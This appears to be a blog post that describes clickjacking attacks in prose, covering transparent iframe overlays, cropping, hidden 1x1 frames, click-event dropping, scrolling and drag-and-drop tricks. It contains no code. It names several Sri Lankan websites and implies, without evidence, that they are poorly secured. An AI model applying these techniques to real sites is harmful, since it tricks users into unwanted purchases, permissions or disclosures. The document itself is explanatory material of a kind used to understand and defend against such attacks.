- Nozero.lk
- Sipwinonline.lk
- Daraz.lk
- Myschool.lk
⛑️What a Typical Clickjacking Attack Looks Like💻
⚠️By far the most common approach to clickjacking involves presenting the user with a mix of two overlaid web pages in the browser window and some kind of incentive to click in specified places. The attacker starts by loading the vulnerable target website into an iframe, sets it to full transparency, and places the frame in front of a malicious web page created to elicit clicks in suitable places.
🏴☠️For example, imagine a fun browser-based game displayed in a popup window, perhaps offering prizes or attractive content for winners. The game could be shown as the background page, and the targeted web application, such as a banking or e-commerce site, overlaid on top of it in a completely transparent frame. The attacker crafts the game page so that clickable items are in the same position as selected controls on the targeted site. When attempting to click in-game items, the user is actually clicking invisible controls on the vulnerable web page with potentially serious consequences.
🧬Depending on the site used, the victim might be unwittingly sending 5-star reviews, liking dubious Facebook pages, giving permissions to Facebook applications, logging in using SSO schemes, or using 1-click shopping to ship expensive items to the attacker. If combined with drag-and-drop techniques, the attack might also trick the user into completing text fields in a web form or filling CAPTCHAs. In this case, carefully prepared interactions with the game cause the user to unknowingly drag text on the invisible page and drop it on a form field.
☢️Types of Clickjacking Attacks🖥️
🔰Clickjacking is not one specific attack, but a broad family of attack vectors and techniques, broadly termed UI redress attacks. Attacks can be divided into two general categories, based on the use of overlaid content. Overlay-based attacks are by far the most popular, and embedding pages in invisible iframes is the most common technical approach here. Again, there are several main categories of overlay-based clickjacking:
- Complete transparent overlay: This is the method used in our example above, where a transparent legitimate page (here called a tool page) is overlaid over a carefully crafted malicious page. The tool page is loaded into an invisible iframe and positioned above the visible page by setting a higher z-index value. One of the first high-profile clickjacking attacks used this method against the Adobe Flash plug-in settings page to trick users into giving Flash animations access to the computer’s camera and microphone.
- Cropping: For this attack, the attacker overlays only selected controls from the transparent page on the visible page. Depending on the aim of the attack, this could mean covering buttons with invisible hyperlinks to trigger a different action than expected, covering text labels with misleading instructions, replacing button labels with false commands, or covering up the entire legitimate page with misleading content, leaving only one original button exposed.
- Hidden overlay: This was the first demonstrated approach to clickjacking. The attacker creates a 1x1 pixel iframe containing malicious content and positions it under the mouse cursor, so it’s hidden by the cursor but any click will register on the malicious page.
- Click event dropping: The legitimate page is displayed in the foreground, completely obscuring the malicious page behind it. The attacker sets the CSS pointer-events property of the top to none, causing click events to “drop” through the overlaid legitimate page, only registering on the malicious page below.
- Rapid content replacement: Opaque overlays are used to cover up the targeted controls, only removed for a fraction of a second to register the click, and immediately replaced. This requires the attacker to predict the exact moment of the victim’s click, but with a little knowledge of computer user habits and psychology, it’s easier than it sounds.
Even without exploiting clickjacking vulnerabilities to insert overlays, attackers have many options for tricking users into clicking unexpected controls:
- Scrolling: The attacker partially scrolls a legitimate dialog box or other web page element off the screen, so the user only sees some of the controls. For example, a warning dialog might be scrolled off the screen so that only the OK and Cancel buttons are visible, with the attacker positioning an innocuous prompt text so it looks like the buttons apply to this message, and not a warning.
- Repositioning: This attack requires the attacker to rapidly move a trusted dialog (or another UI element) under the cursor while the user is focused on clicking some other, innocent-looking items. If this works, the user will instinctively click the substituted control before they realize that something has changed. As with rapid content replacement, the attacker may quickly move the dialog back after the click to avoid detection.
- Drag-and-drop: While most clickjacking attacks explicitly focus on intercepting clicks, drag-and-drop vulnerabilities can be exploited to trick the user into performing a variety of other actions, such as completing web forms by dragging invisible text into invisible text boxes or revealing sensitive personal information to the attacker.
- ...and many others: The dynamic interactions between the user and web page elements made possible by combining JavaScript, DOM, and CSS offer innumerable options for tricking users into performing unexpected actions. Because clickjacking attacks exploit the user’s trust in the displayed content and controls, they can be hard to detect automatically, and new attacks will continue to appear.
- I Think security level must be increase in those websites..
Comments
Post a Comment